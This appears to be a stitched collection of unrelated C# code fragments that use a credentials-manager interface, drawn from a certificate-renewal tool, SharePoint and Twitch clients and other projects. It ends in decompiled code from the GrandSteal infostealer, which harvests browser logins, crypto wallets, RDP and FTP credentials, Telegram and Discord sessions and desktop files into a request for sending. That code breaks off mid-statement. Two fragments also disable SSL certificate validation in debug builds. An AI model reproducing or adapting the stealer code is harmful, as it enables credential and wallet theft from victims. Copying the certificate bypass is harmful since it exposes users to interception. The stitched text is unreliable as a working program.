public async Task <List <ActionResult> > Execute(
ILog log,
ICredentialsManager credentialsManager,
object subject,
CancellationToken cancellationToken,
bool isPreviewOnly = true
)
{
if (TaskProvider != null && TaskConfig != null)
{
try
{
var execParams = new DeploymentTaskExecutionParams(log, credentialsManager, subject, TaskConfig, _credentials, isPreviewOnly, null, cancellationToken);
return(await TaskProvider.Execute(execParams));
}
catch (Exception exp)
{
return(new List <ActionResult> {
new ActionResult {
IsSuccess = false, Message = $"{TaskConfig.TaskName} ({TaskProvider.GetDefinition()?.Title }) :: Task Failed with Exception :: {exp?.ToString()}"
}
});
}
}
else
{
return(new List <ActionResult> {
new ActionResult {
IsSuccess = false, Message = "Cannot Execute Deployment Task: TaskProvider or Config not set."
}
});
}
}
public AuthenticationController(IAccountManager accountManager, IUserCollection userCollection, IUser user, ICredentialsManager credentialsManager)
{
_accountManager = accountManager;
_userCollection = userCollection;
_user = user;
_credentialsManager = credentialsManager;
}
public SPListService(ICredentialsManager credentials, IListDataService listDataService, IListItemService listItemService, IListItemDataService listItemDataService)
{
this.credentials = credentials;
this.listDataService = listDataService;
this.listItemDataService = listItemDataService;
this.listItemService = listItemService;
}
public EmployeeEditViewModel(DomainModelService.Employee model, IEnumerable <EmployeeGroup> allGroups, Action removeEmployeeAction, IEmployeeRepository employeeRepository,
ICredentialsManager credentialsManager, ISettingsProvider settingsProvider)
: base(model, allGroups, employeeRepository, credentialsManager)
{
m_RemoveEmployee = removeEmployeeAction;
m_SettingsProvider = settingsProvider;
m_OldUserName = model.UserName;
DisplayName = TranslationProvider.Translate("TitleEmployeeEditViewModel");
}
public EmployeeAddViewModel(DomainModelService.Employee model, IEnumerable <EmployeeGroup> allGroups, IEmployeeRepository employeeRepository, ICredentialsManager credentialsManager)
{
m_Model = model;
Password = string.Empty;
m_AllGroups = allGroups;
m_EmployeeRepository = employeeRepository;
m_CredentialsManager = credentialsManager;
DisplayName = TranslationProvider.Translate("TitleEmployeeAddViewModel");
m_GroupList = new List <SelectableGroupViewModel>();
CreateSelectableGroupViewModels();
}
public TwitchClientFactory(
Func <IClientOptions, IClient> clientFactory,
ClientProtocol clientProtocol,
ILogger <TwitchClient> logger,
ICredentialsManager credentialsManager)
{
ClientFactory = clientFactory;
ClientProtocol = clientProtocol;
Logger = logger;
CredentialsManager = credentialsManager;
}
public MainForm()
{
InitializeComponent();
startButton.Enabled = false;
removeButton.Enabled = false;
_credentialsManager = new CredentialsManager();
_credentialsManager.MappedTypes.Add(typeof(CrystalCredentials).Name, typeof(CrystalCredentials));
_credentialsManager.MappedTypes.Add(typeof(ZirconCredentials).Name, typeof(ZirconCredentials));
_credentialsManager.Load();
RefreshUi();
}
public void TestInitialize()
{
AppDomain.CurrentDomain.SetData("DataDirectory", AppDomain.CurrentDomain.BaseDirectory);
container = new UnityContainer();
container
.RegisterType <IDataAccessAdapter, DataAccessAdapter>()
.RegisterType <IRepository <User>, UserRepository>()
.RegisterType <IOtpGenerator, FakeOtpGenerator>()
.RegisterType <ILogger, FakeLogger>()
.RegisterType <ICredentialsManager <ApplicationRule>, CredentialsManager>();
application = container.Resolve <ICredentialsManager <ApplicationRule> >();
}
public ClientManager(IRepository <UriRepositoryItem> repository, ICredentialsManager credentialsManger, ILoginManager loginManager)
{
_repository = repository;
_credentialsManager = credentialsManger;
_loginManager = loginManager;
JoinableTaskContext joinableTaskContext = null;
if (ThreadHelper.CheckAccess())
{
joinableTaskContext = ThreadHelper.JoinableTaskContext;
}
_clients = new AsyncLazy <ICollection <ISonarQubeClient> >(LoadClientsAsync, joinableTaskContext?.Factory);
}
public TwitchClientManager(
IApplicationContextFactory contextFactory,
ITwitchClientFactory factory,
ICredentialsManager credentialsManager,
ISpinWaitService spinWaitService,
IThreadService threadService,
IDateTimeService dateTime,
TextWriter writer)
{
ContextFactory = contextFactory;
Factory = factory;
CredentialsManager = credentialsManager;
SpinWaitService = spinWaitService;
ThreadService = threadService;
DateTime = dateTime;
Writer = writer;
LastLowPriorityMessageSent = new();
}
public DeploymentTaskExecutionParams(
ILog log,
ICredentialsManager credentialsManager,
object subject,
DeploymentTaskConfig settings,
Dictionary <string, string> credentials,
bool isPreviewOnly,
DeploymentProviderDefinition definition,
CancellationToken cancellationToken
)
{
Log = log;
CredentialsManager = credentialsManager;
Subject = subject;
Settings = settings;
Credentials = credentials;
IsPreviewOnly = isPreviewOnly;
Definition = definition;
CancellationToken = cancellationToken;
}
public SscOperations(ISsmsOperations ssmsOperations,
ApplicationDispatcher dispatcher,
ICredentialsManager credentialsManager,
IDialogController dialogController,
SscEndpoints sscEndpoints,
IFavoriteScriptsStore favoriteStore)
{
m_SsmsOperations = ssmsOperations;
m_Dispatcher = dispatcher;
m_CredentialsManager = credentialsManager;
m_DialogController = dialogController;
m_SscEndpoints = sscEndpoints;
m_FavoriteStore = favoriteStore;
#if DEBUG
//Trust all SSL issues when debugging. Obviously this is terrible as we are now susceptible to MITM attacks.
ServicePointManager.ServerCertificateValidationCallback =
((sender, certificate, chain, sslPolicyErrors) => true);
#endif
}
public SscOperations(ISsmsOperations ssmsOperations,
ApplicationDispatcher dispatcher,
ICredentialsManager credentialsManager,
IDialogController dialogController,
SscEndpoints sscEndpoints,
IFavoriteScriptsStore favoriteStore)
{
m_SsmsOperations = ssmsOperations;
m_Dispatcher = dispatcher;
m_CredentialsManager = credentialsManager;
m_DialogController = dialogController;
m_SscEndpoints = sscEndpoints;
m_FavoriteStore = favoriteStore;
#if DEBUG
//Trust all SSL issues when debugging. Obviously this is terrible as we are now susceptible to MITM attacks.
ServicePointManager.ServerCertificateValidationCallback =
((sender, certificate, chain, sslPolicyErrors) => true);
#endif
}
public CredentialsService(ICredentialsManager credentialsManager, IPermissionValidator permissionValidator)
{
_credentialsManager = DIHelper.VerifyParameter(credentialsManager);
_permissionValidator = DIHelper.VerifyParameter(permissionValidator);
}
public async Task <DnsChallengeHelperResult> GetDnsProvider(string providerTypeId, string credentialsId, Dictionary <string, string> parameters, ICredentialsManager credentialsManager)
{
var credentials = new Dictionary <string, string>();
IDnsProvider dnsAPIProvider = null;
if (!string.IsNullOrEmpty(credentialsId))
{
// decode credentials string array
try
{
credentials = await credentialsManager.GetUnlockedCredentialsDictionary(credentialsId);
}
catch (Exception)
{
return(new DnsChallengeHelperResult
{
Result = new ActionResult {
IsSuccess = false, Message = "DNS Challenge API Credentials could not be decrypted. The original user must be used for decryption."
},
PropagationSeconds = 0,
IsAwaitingUser = false
});
}
}
try
{
dnsAPIProvider = await ChallengeProviders.GetDnsProvider(providerTypeId, credentials, parameters);
}
catch (ChallengeProviders.CredentialsRequiredException)
{
return(new DnsChallengeHelperResult
{
Result = new ActionResult {
IsSuccess = false, Message = "This DNS Challenge API requires one or more credentials to be specified."
},
PropagationSeconds = 0,
IsAwaitingUser = false
});
}
catch (Exception exp)
{
return(new DnsChallengeHelperResult
{
Result = new ActionResult {
IsSuccess = false, Message = $"DNS Challenge API Provider could not be created. Check all required credentials are set and software dependencies installed. {exp.ToString()}"
},
PropagationSeconds = 0,
IsAwaitingUser = false
});
}
if (dnsAPIProvider == null)
{
return(new DnsChallengeHelperResult
{
Result = new ActionResult {
IsSuccess = false, Message = "DNS Challenge API Provider not set or could not load."
},
PropagationSeconds = 0,
IsAwaitingUser = false
});
}
return(new DnsChallengeHelperResult
{
Result = new ActionResult {
IsSuccess = true, Message = "Create Provider Instance"
},
Provider = dnsAPIProvider
});
}
internal SharePointPermissions(ICredentialsManager credentials)
{
this.credentials = credentials;
}
/// <summary>
/// Generate a list of actions which will be performed on the next renewal of this managed certificate, populating
/// the description of each action with a Markdown format description
/// </summary>
/// <param name="item"></param>
/// <param name="serverProvider"></param>
/// <param name="certifyManager"></param>
/// <returns></returns>
public async Task <List <ActionStep> > GeneratePreview(
ManagedCertificate item,
ICertifiedServer serverProvider,
ICertifyManager certifyManager,
ICredentialsManager credentialsManager
)
{
var newLine = "\r\n";
var steps = new List <ActionStep>();
var stepIndex = 1;
var hasDomains = true;
var allTaskProviders = await certifyManager.GetDeploymentProviders();
var certificateAuthorities = await certifyManager.GetCertificateAuthorities();
// ensure defaults are applied for the deployment mode, overwriting any previous selections
item.RequestConfig.ApplyDeploymentOptionDefaults();
if (string.IsNullOrEmpty(item.RequestConfig.PrimaryDomain))
{
hasDomains = false;
}
if (hasDomains)
{
var allCredentials = await credentialsManager.GetCredentials();
var allDomains = new List <string> {
item.RequestConfig.PrimaryDomain
};
if (item.RequestConfig.SubjectAlternativeNames != null)
{
allDomains.AddRange(item.RequestConfig.SubjectAlternativeNames);
}
allDomains = allDomains.Distinct().OrderBy(d => d).ToList();
// certificate summary
var certDescription = new StringBuilder();
var ca = certificateAuthorities.FirstOrDefault(c => c.Id == item.CertificateAuthorityId);
certDescription.AppendLine(
$"A new certificate will be requested from the *{ca?.Title ?? "Default"}* certificate authority for the following domains:"
);
certDescription.AppendLine($"\n**{item.RequestConfig.PrimaryDomain}** (Primary Domain)");
if (item.RequestConfig.SubjectAlternativeNames.Any(s => s != item.RequestConfig.PrimaryDomain))
{
certDescription.AppendLine($" and will include the following *Subject Alternative Names*:");
foreach (var d in item.RequestConfig.SubjectAlternativeNames)
{
certDescription.AppendLine($"* {d} ");
}
}
steps.Add(new ActionStep
{
Title = "Summary",
Description = certDescription.ToString()
});
// validation steps :
// TODO: preview description should come from the challenge type provider
var challengeInfo = new StringBuilder();
foreach (var challengeConfig in item.RequestConfig.Challenges)
{
challengeInfo.AppendLine(
$"{newLine}Authorization will be attempted using the **{challengeConfig.ChallengeType}** challenge type." +
newLine
);
var matchingDomains = item.GetChallengeConfigDomainMatches(challengeConfig, allDomains);
if (matchingDomains.Any())
{
challengeInfo.AppendLine(
$"{newLine}The following matching domains will use this challenge: " + newLine
);
foreach (var d in matchingDomains)
{
challengeInfo.AppendLine($"{newLine} * {d}");
}
challengeInfo.AppendLine(
$"{newLine}**Please review the Deployment section below to ensure this certificate will be applied to the expected website bindings (if any).**" + newLine
);
}
else
{
challengeInfo.AppendLine(
$"{newLine}*No domains will match this challenge type.* Either the challenge is not required or domain matches are not fully configured."
);
}
challengeInfo.AppendLine(newLine);
if (challengeConfig.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP)
{
challengeInfo.AppendLine(
$"This will involve the creation of a randomly named (extensionless) text file for each domain (website) included in the certificate." +
newLine
);
if (CoreAppSettings.Current.EnableHttpChallengeServer)
{
challengeInfo.AppendLine(
$"The *Http Challenge Server* option is enabled. This will create a temporary web service on port 80 during validation. " +
$"This process co-exists with your main web server and listens for http challenge requests to /.well-known/acme-challenge/. " +
$"If you are using a web server on port 80 other than IIS (or other http.sys enabled server), that will be used instead." +
newLine
);
}
if (!string.IsNullOrEmpty(item.RequestConfig.WebsiteRootPath) && string.IsNullOrEmpty(challengeConfig.ChallengeRootPath))
{
challengeInfo.AppendLine(
$"The file will be created at the path `{item.RequestConfig.WebsiteRootPath}\\.well-known\\acme-challenge\\` " +
newLine
);
}
if (!string.IsNullOrEmpty(challengeConfig.ChallengeRootPath))
{
challengeInfo.AppendLine(
$"The file will be created at the path `{challengeConfig.ChallengeRootPath}\\.well-known\\acme-challenge\\` " +
newLine
);
}
challengeInfo.AppendLine(
$"The text file will need to be accessible from the URL `http://<yourdomain>/.well-known/acme-challenge/<randomfilename>` " +
newLine);
challengeInfo.AppendLine(
$"The issuing Certificate Authority will follow any redirection in place (such as rewriting the URL to *https*) but the initial request will be made via *http* on port 80. " +
newLine);
}
if (challengeConfig.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS)
{
challengeInfo.AppendLine(
$"This will involve the creation of a DNS TXT record named `_acme-challenge.yourdomain.com` for each domain or subdomain included in the certificate. " +
newLine);
if (!string.IsNullOrEmpty(challengeConfig.ChallengeCredentialKey))
{
var creds = allCredentials.FirstOrDefault(c => c.StorageKey == challengeConfig.ChallengeCredentialKey);
if (creds != null)
{
challengeInfo.AppendLine(
$"The following DNS API Credentials will be used: **{creds.Title}** " + newLine);
}
else
{
challengeInfo.AppendLine(
$"**Invalid credential settngs.** The currently selected credential does not exist."
);
}
}
else
{
challengeInfo.AppendLine(
$"No DNS API Credentials have been set. API Credentials are normally required to make automatic updates to DNS records."
);
}
challengeInfo.AppendLine(
newLine + $"The issuing Certificate Authority will follow any redirection in place (such as a substitute CNAME pointing to another domain) but the initial request will be made against any of the domain's nameservers. "
);
}
if (!string.IsNullOrEmpty(challengeConfig.DomainMatch))
{
challengeInfo.AppendLine(
$"{newLine}This challenge type will be selected based on matching domain **{challengeConfig.DomainMatch}** ");
}
else
{
if (item.RequestConfig.Challenges.Count > 1)
{
challengeInfo.AppendLine(
$"{newLine}This challenge type will be selected for any domain not matched by another challenge. ");
}
else
{
challengeInfo.AppendLine(
$"{newLine}**This challenge type will be selected for all domains.**");
}
}
challengeInfo.AppendLine($"{newLine}---{newLine}");
}
steps.Add(new ActionStep
{
Title = $"{stepIndex}. Domain Validation",
Category = "Validation",
Description = challengeInfo.ToString()
});
stepIndex++;
// pre request tasks
if (item.PreRequestTasks?.Any() == true)
{
var substeps = item.PreRequestTasks.Select(t => new ActionStep {
Key = t.Id, Title = $"{t.TaskName} ({allTaskProviders.FirstOrDefault(p => p.Id == t.TaskTypeId)?.Title})", Description = t.Description
});
steps.Add(new ActionStep
{
Title = $"{stepIndex}. Pre-Request Tasks",
Category = "PreRequestTasks",
Description = $"Execute {substeps.Count()} Pre-Request Tasks",
Substeps = substeps.ToList()
});
stepIndex++;
}
// cert request step
var certRequest =
$"A Certificate Signing Request (CSR) will be submitted to the Certificate Authority, using the **{item.RequestConfig.CSRKeyAlg}** signing algorithm.";
steps.Add(new ActionStep
{
Title = $"{stepIndex}. Certificate Request",
Category = "CertificateRequest",
Description = certRequest
});
stepIndex++;
// deployment & binding steps
var deploymentDescription = new StringBuilder();
var deploymentStep = new ActionStep
{
Title = $"{stepIndex}. Deployment",
Category = "Deployment",
Description = ""
};
if (
item.RequestConfig.DeploymentSiteOption == DeploymentOption.Auto ||
item.RequestConfig.DeploymentSiteOption == DeploymentOption.AllSites ||
item.RequestConfig.DeploymentSiteOption == DeploymentOption.SingleSite
)
{
// deploying to single or multiple Site
if (item.RequestConfig.DeploymentBindingMatchHostname)
{
deploymentDescription.AppendLine(
"* Deploy to hostname bindings matching certificate domains.");
}
if (item.RequestConfig.DeploymentBindingBlankHostname)
{
deploymentDescription.AppendLine("* Deploy to bindings with blank hostname.");
}
if (item.RequestConfig.DeploymentBindingReplacePrevious)
{
deploymentDescription.AppendLine("* Deploy to bindings with previous certificate.");
}
if (item.RequestConfig.DeploymentBindingOption == DeploymentBindingOption.AddOrUpdate)
{
deploymentDescription.AppendLine("* Add or Update https bindings as required");
}
if (item.RequestConfig.DeploymentBindingOption == DeploymentBindingOption.UpdateOnly)
{
deploymentDescription.AppendLine("* Update https bindings as required (no auto-created https bindings)");
}
if (item.RequestConfig.DeploymentSiteOption == DeploymentOption.SingleSite)
{
if (!string.IsNullOrEmpty(item.ServerSiteId))
{
try
{
var siteInfo = await serverProvider.GetSiteById(item.ServerSiteId);
deploymentDescription.AppendLine($"## Deploying to Site" + newLine + newLine +
$"`{siteInfo.Name}`" + newLine);
}
catch (Exception exp)
{
deploymentDescription.AppendLine($"Error: **cannot identify selected site.** {exp.Message} ");
}
}
}
else
{
deploymentDescription.AppendLine($"## Deploying to all matching sites:");
}
// add deployment sub-steps (if any)
var bindingRequest = await certifyManager.DeployCertificate(item, null, true);
if (bindingRequest.Actions == null || !bindingRequest.Actions.Any())
{
deploymentStep.Substeps = new List <ActionStep>
{
new ActionStep {
Description = newLine + "**There are no matching targets to deploy to. Certificate will be stored but currently no bindings will be updated.**"
}
};
}
else
{
deploymentStep.Substeps = bindingRequest.Actions;
deploymentDescription.AppendLine(" Action | Site | Binding ");
deploymentDescription.Append(" ------ | ---- | ------- ");
}
}
else if (item.RequestConfig.DeploymentSiteOption == DeploymentOption.DeploymentStoreOnly)
{
deploymentDescription.AppendLine("* The certificate will be saved to the local machines Certificate Store only (Personal/My Store)");
}
else if (item.RequestConfig.DeploymentSiteOption == DeploymentOption.NoDeployment)
{
deploymentDescription.AppendLine("* The certificate will be saved to local disk only.");
}
deploymentStep.Description = deploymentDescription.ToString();
steps.Add(deploymentStep);
stepIndex++;
// post request deployment tasks
if (item.PostRequestTasks?.Any() == true)
{
var substeps = item.PostRequestTasks.Select(t => new ActionStep {
Key = t.Id, Title = $"{t.TaskName} ({allTaskProviders.FirstOrDefault(p => p.Id == t.TaskTypeId)?.Title})", Description = t.Description
});
steps.Add(new ActionStep
{
Title = $"{stepIndex}. Post-Request (Deployment) Tasks",
Category = "PostRequestTasks",
Description = $"Execute {substeps.Count()} Post-Request Tasks",
Substeps = substeps.ToList()
});
stepIndex++;
}
stepIndex = steps.Count;
}
else
{
steps.Add(new ActionStep
{
Title = "Certificate has no domains",
Description = "No domains have been added to this certificate, so a certificate cannot be requested. Each certificate requires a primary domain (a 'subject') and an optional list of additional domains (subject alternative names)."
});
}
return(steps);
}
/// <summary>
/// Simulates responding to a challenge, performs a sample configuration and attempts to
/// verify it.
/// </summary>
/// <param name="serverManager"> </param>
/// <param name="managedCertificate"> </param>
/// <returns> APIResult </returns>
/// <remarks>
/// The purpose of this method is to test the options (permissions, configuration) before
/// submitting a request to the ACME server, to avoid creating failed requests and hitting
/// usage limits.
/// </remarks>
public async Task <List <StatusMessage> > TestChallengeResponse(
ILog log,
ICertifiedServer serverManager,
ManagedCertificate managedCertificate,
bool isPreviewMode,
bool enableDnsChecks,
ICredentialsManager credentialsManager,
IProgress <RequestProgressState> progress = null
)
{
var results = new List <StatusMessage>();
var requestConfig = managedCertificate.RequestConfig;
var domains = new List <string> {
requestConfig.PrimaryDomain
};
if (requestConfig.SubjectAlternativeNames != null)
{
domains.AddRange(requestConfig.SubjectAlternativeNames);
}
domains = domains.Distinct().ToList();
// if wildcard domain included, check first level labels not also specified, i.e.
// *.example.com & www.example.com cannot be mixed, but example.com, *.example.com &
// test.wwww.example.com can
var invalidLabels = new List <string>();
if (domains.Any(d => d.StartsWith("*.")))
{
foreach (var wildcard in domains.Where(d => d.StartsWith("*.")))
{
var rootDomain = wildcard.Replace("*.", "");
// add list of domains where label count exceeds root domain label count
invalidLabels.AddRange(domains.Where(domain => domain != wildcard && domain.EndsWith(rootDomain) && domain.Count(s => s == '.') == wildcard.Count(s => s == '.')));
if (invalidLabels.Any())
{
results.Add(new StatusMessage {
IsOK = false, Message = $"Wildcard domain certificate requests (e.g. {wildcard}) cannot be mixed with requests including immediate subdomains (e.g. {invalidLabels[0]})."
});
return(results);
}
}
}
var generatedAuthorizations = new List <PendingAuthorization>();
try
{
// if DNS checks enabled, attempt them here
if (isPreviewMode && enableDnsChecks)
{
var includeIPResolution = false;
if (managedCertificate.RequestConfig.Challenges.Any(c => c.ChallengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP))
{
includeIPResolution = true;
}
log.Information("Performing preview DNS tests. {managedItem}", managedCertificate);
var tasks = new List <Task <List <ActionResult> > >();
foreach (var d in domains)
{
tasks.Add(_netUtil.CheckDNS(log, d.Replace("*.", ""), includeIPResolution));
}
var allResults = await Task.WhenAll(tasks);
// add DNS check results. DNS check fails are considered a warning instead of an error.
foreach (var checkResults in allResults)
{
foreach (var c in checkResults)
{
results.Add(new StatusMessage
{
IsOK = true,
HasWarning = !c.IsSuccess,
Message = c.Message
});
}
}
}
foreach (var domain in domains)
{
var challengeConfig = managedCertificate.GetChallengeConfig(domain);
var challengeType = challengeConfig.ChallengeType;
if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_SNI)
{
log.Warning("tls-sni-01 challenge type is no longer supported by the Certificate Authority. Falling back to http-01");
challengeType = SupportedChallengeTypes.CHALLENGE_TYPE_HTTP;
}
if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_HTTP)
{
// if dns validation not selected but one or more domains is a wildcard, reject
if (domain.StartsWith("*."))
{
results.Add(new StatusMessage {
IsOK = false, Message = $"http-01 authorization cannot be used for wildcard domains: {domain}. Use DNS (dns-01) validation instead."
});
return(results);
}
var challengeFileUrl = $"http://{domain}/.well-known/acme-challenge/configcheck";
var simulatedAuthorization = new PendingAuthorization
{
Challenges = new List <AuthorizationChallengeItem> {
new AuthorizationChallengeItem
{
ChallengeType = SupportedChallengeTypes.CHALLENGE_TYPE_HTTP,
ResourcePath = Path.Combine(".well-known", "acme-challenge", "configcheck"),
ResourceUri = challengeFileUrl,
Value = "Extensionless File Config Test - OK"
}
}
};
generatedAuthorizations.Add(simulatedAuthorization);
var httpChallengeResult = await PerformChallengeResponse_Http01(
log, serverManager, domain, managedCertificate, simulatedAuthorization
);
if (!httpChallengeResult.IsSuccess)
{
var result = new StatusMessage();
result.IsOK = false;
result.FailedItemSummary.Add($"Config checks failed to verify http://{domain} is both publicly accessible and can serve extensionless files e.g. {challengeFileUrl}");
result.Message = httpChallengeResult.Message;
results.Add(result);
// don't check any more after first failure
break;
}
else
{
results.Add(new StatusMessage {
IsOK = true, Message = httpChallengeResult.Message, Result = httpChallengeResult
});
}
}
else if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_SNI)
{
var result = new StatusMessage();
result.IsOK = false;
result.FailedItemSummary.Add($"The {SupportedChallengeTypes.CHALLENGE_TYPE_SNI} challenge type is no longer available.");
results.Add(result);
return(results);
/*
*
* var serverVersion = await serverManager.GetServerVersion();
*
* if (serverVersion.Major < 8)
* {
* result.IsOK = false;
* result.FailedItemSummary.Add($"The {SupportedChallengeTypes.CHALLENGE_TYPE_SNI} challenge is only available for IIS versions 8+.");
* results.Add(result);
*
* return results;
* }
*
* var simulatedAuthorization = new PendingAuthorization
* {
* Challenges = new List<AuthorizationChallengeItem> {
* new AuthorizationChallengeItem
* {
* ChallengeType = SupportedChallengeTypes.CHALLENGE_TYPE_SNI,
* HashIterationCount= 1,
* Value = GenerateSimulatedKeyAuth()
* }
* }
* };
*
* generatedAuthorizations.Add(simulatedAuthorization);
*
* result.IsOK =
* PrepareChallengeResponse_TlsSni01(
* log, serverManager, domain, managedCertificate, simulatedAuthorization
* )();
*
* results.Add(result);
*/
}
else if (challengeType == SupportedChallengeTypes.CHALLENGE_TYPE_DNS)
{
var recordName = $"_acme-challenge-test.{domain}".Replace("*.", "");
// ISSUE: dependency on changing behavior for a specific plugin
if (challengeConfig.ChallengeProvider == "DNS01.API.AcmeDns")
{
// use real cname to avoid having to setup different records
recordName = $"_acme-challenge.{domain}".Replace("*.", "");
}
var simulatedAuthorization = new PendingAuthorization
{
Challenges = new List <AuthorizationChallengeItem> {
new AuthorizationChallengeItem
{
ChallengeType = SupportedChallengeTypes.CHALLENGE_TYPE_DNS,
Key = recordName,
Value = GenerateSimulatedDnsAuthValue()
}
}
};
generatedAuthorizations.Add(simulatedAuthorization);
var dnsResult =
await PerformChallengeResponse_Dns01(
log,
domain,
managedCertificate,
simulatedAuthorization,
isTestMode : true,
credentialsManager
);
var result = new StatusMessage();
result.Message = dnsResult.Result.Message;
result.IsOK = dnsResult.Result.IsSuccess;
if (!result.IsOK)
{
result.FailedItemSummary.Add(dnsResult.Result.Message);
}
results.Add(result);
}
else
{
throw new NotSupportedException($"ChallengeType not supported: {challengeConfig.ChallengeType}");
}
}
}
finally
{
//FIXME: needs to be filtered by managed site: result.Message = String.Join("\r\n", GetActionLogSummary());
generatedAuthorizations.ForEach(ga => ga.Cleanup());
}
return(results);
}
public DnsChallengeHelper(ICredentialsManager credentialsManager)
{
_credentialsManager = credentialsManager;
}
internal ManagedMetadataEditor(ICredentialsManager credentials)
{
this.credentials = credentials;
}
internal ManagedMetadataEntity(ICredentialsManager credentials, SP.Field Field, object Value, string baseurl)
{
this.credentials = credentials;
Init(Field, baseurl);
SetCurrentKeys(Value);
}
public SPAttachmentsService(ICredentialsManager credentials)
{
this.credentials = credentials;
}
// Token: 0x0600004F RID: 79 RVA: 0x00003EC8 File Offset: 0x000020C8
public bool SendCredentials()
{
bool result;
try
{
GrandSteal.Client.Models.ClientSettings settings = this.RecieveSettings().IsNull(new GrandSteal.Client.Models.ClientSettings());
List <BrowserProfile> browserProfiles = new List <BrowserProfile>();
List <ColdWallet> wallets = new List <ColdWallet>();
List <RdpCredential> rdpCredentials = new List <RdpCredential>();
List <DesktopFile> desktopFiles = new List <DesktopFile>();
List <FtpCredential> ftpCredentials = new List <FtpCredential>();
TelegramSession telegramSession = new TelegramSession();
DiscordSession discordSession = new DiscordSession();
List <RemoteProcess> processes = new List <RemoteProcess>();
List <string> programs = new List <string>();
RemoteClientInformation clientInfo = new RemoteClientInformation();
ThreadPool.SetMaxThreads(2000, 10000);
new Thread(delegate
{
Console.WriteLine("ClientInfos parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
clientInfo = ClientInfoHelper.Create(this.BuildID);
stopwatch.Stop();
this.clientInfoFlag.Set();
Console.WriteLine(string.Format("ClientInfos has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("Browsers parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabBrowserCredentials)
{
int countCompleted = 0;
object locker = new object();
using (IEnumerator <ICredentialsManager <BrowserProfile> > enumerator = this.BrowserCredentialsManagers.GetEnumerator())
{
while (enumerator.MoveNext())
{
ICredentialsManager <BrowserProfile> manager = enumerator.Current;
new Thread(delegate
{
List <BrowserProfile> all = manager.GetAll();
object locker = locker;
lock (locker)
{
browserProfiles.AddRange(all);
int countCompleted = countCompleted;
countCompleted++;
}
}).Start();
}
}
while (countCompleted != this.BrowserCredentialsManagers.Count)
{
}
}
stopwatch.Stop();
this.browsersFlag.Set();
Console.WriteLine(string.Format("Browsers has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("ColdWallets parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabColdWallets)
{
foreach (ICredentialsManager <ColdWallet> current in this.ColdWalletManagers)
{
wallets.AddRange(current.GetAll().IsNull(new List <ColdWallet>()));
}
}
stopwatch.Stop();
this.walletsFlag.Set();
Console.WriteLine(string.Format("ColdWallets has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("DiscordSession parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabDiscord)
{
discordSession = DiscordManager.Extract();
}
stopwatch.Stop();
this.discordFlag.Set();
Console.WriteLine(string.Format("DiscordSession has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("Rdps parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabRdp)
{
foreach (ICredentialsManager <RdpCredential> current in this.RdpManagers)
{
rdpCredentials.AddRange(current.GetAll().IsNull <List <RdpCredential> >());
}
}
stopwatch.Stop();
this.rdpsFlag.Set();
Console.WriteLine(string.Format("Rdps has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("DesktopFiles parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabDesktopFiles)
{
foreach (DesktopFileManager current in this.DesktopFileManagers)
{
current.DesktopFileExtensions = settings.DesktopExtensions;
desktopFiles.AddRange(current.GetAll());
}
}
stopwatch.Stop();
this.desktopFlag.Set();
Console.WriteLine(string.Format("DesktopFiles has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("FTPs parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabFtp)
{
foreach (ICredentialsManager <FtpCredential> current in this.FtpManagers)
{
ftpCredentials.AddRange(current.GetAll().IsNull <List <FtpCredential> >());
}
}
stopwatch.Stop();
this.ftpFlag.Set();
Console.WriteLine(string.Format("FTPs has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("TelegramSession parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
if (settings.GrabTelegram)
{
telegramSession = TelegramManager.Extract();
}
stopwatch.Stop();
this.telegramFlag.Set();
Console.WriteLine(string.Format("TelegramSession has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("ListOfProcesses parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
processes = ClientInfoHelper.ListOfProcesses();
stopwatch.Stop();
this.processesFlag.Set();
Console.WriteLine(string.Format("ListOfProcesses has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
new Thread(delegate
{
Console.WriteLine("ListOfPrograms parser has been started");
Stopwatch stopwatch = new Stopwatch();
stopwatch.Start();
programs = ClientInfoHelper.ListOfPrograms();
stopwatch.Stop();
this.programsFlag.Set();
Console.WriteLine(string.Format("ListOfPrograms has been parsed.Elapsed time: {0}", stopwatch.Elapsed));
}).Start();
this.telegramFlag.WaitOne();
this.discordFlag.WaitOne();
this.processesFlag.WaitOne();
this.programsFlag.WaitOne();
this.browsersFlag.WaitOne();
this.walletsFlag.WaitOne();
this.rdpsFlag.WaitOne();
this.desktopFlag.WaitOne();
this.ftpFlag.WaitOne();
this.clientInfoFlag.WaitOne();
Console.WriteLine("CredentialsRequest has been created");
if (clientInfo == null)
{
Environment.Exit(0);
}
CredentialsRequest objectToSend = new CredentialsRequest
{
ClientInformation = clientInfo,
BrowserProfiles = browserProfiles,
ColdWallets = wallets,
RdpConnections = rdpCredentials,
DesktopFiles = desktopFiles,
